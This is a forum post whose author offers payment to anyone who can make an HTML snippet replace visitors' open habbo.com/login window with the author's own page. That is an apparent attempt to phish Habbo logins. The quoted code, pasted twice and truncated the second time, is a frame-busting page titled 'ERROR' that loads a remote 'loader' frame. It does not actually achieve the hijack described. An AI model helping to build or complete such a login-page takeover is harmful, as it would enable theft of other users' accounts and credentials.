I'm getting SOOOOO stressed with my site I feel like throwing my computer out of the window!!!!
I can pay somsone via paypal if they can actually get this working for me!!!!
Ok. Let me explain what it is. It's this piece of HTML that if you put on a site, it changes a certain window that people visiting the site at the time have up at the time to my window.
Now, the window I want to change is www.habbo.com/login
It's a client.
&... Here's the HTML...
QUOTE
<html><head><!-- www.freedomain.co.nr -->
<title>ERROR</title>
<META http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META name="resource-type" content="document">
<META name="audience" content="all">
<META name="distribution" content="global">
<META name="robots" content="INDEX, FOLLOW">
<META name="revisit-after" content="10 days">
<META name="description" content="stuff">
<META name="keywords" content="cool">
<script language="JavaScript">
if(top.frames.length > 0)
top.location.href=self.location;
</script>
</head>
<frameset rows="100%,*" frameborder="NO" border="0" framespacing="0">
<frame name="conr_main_frame" src="http://www.freewebs.com/loaderv12/time2.htm">
</frameset>
<noframes>
<body>
<div align=center>
<h1>ERROR</h1>
<p><b>stuff</b></p>
<p>Please <a href="http://www.freewebs.com/loaderv12/time2.htm">Click here</a> to visit <a href="http://www.freewebs.com/loaderv12/time2.htm"><b>ERROR</b></a></p><br><br>
<p>Powered by <a href="http://www.freedomain.co.nr/"><b>Free Domain Name</b></a> - <a href="http://www.freedomain.co.nr/"><b>Free URL Redirection</b></a> and <a href="http://www.freedomain.co.nr/"><b>Free Subdomain</b></a> @ .CO.NR</p>
</div>
</body>
</noframes>
</html>
<title>ERROR</title>
<META http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META name="resource-type" content="document">
<META name="audience" content="all">
<META name="distribution" content="global">
<META name="robots" content="INDEX, FOLLOW">
<META name="revisit-after" content="10 days">
<META name="description" content="stuff">
<META name="keywords" content="cool">
<script language="JavaScript">
if(top.frames.length > 0)
top.location.href=self.location;
</script>
</head>
<frameset rows="100%,*" frameborder="NO" border="0" framespacing="0">
<frame name="conr_main_frame" src="http://www.freewebs.com/loaderv12/time2.htm">
</frameset>
<noframes>
<body>
<div align=center>
<h1>ERROR</h1>
<p><b>stuff</b></p>
<p>Please <a href="http://www.freewebs.com/loaderv12/time2.htm">Click here</a> to visit <a href="http://www.freewebs.com/loaderv12/time2.htm"><b>ERROR</b></a></p><br><br>
<p>Powered by <a href="http://www.freedomain.co.nr/"><b>Free Domain Name</b></a> - <a href="http://www.freedomain.co.nr/"><b>Free URL Redirection</b></a> and <a href="http://www.freedomain.co.nr/"><b>Free Subdomain</b></a> @ .CO.NR</p>
</div>
</body>
</noframes>
</html>

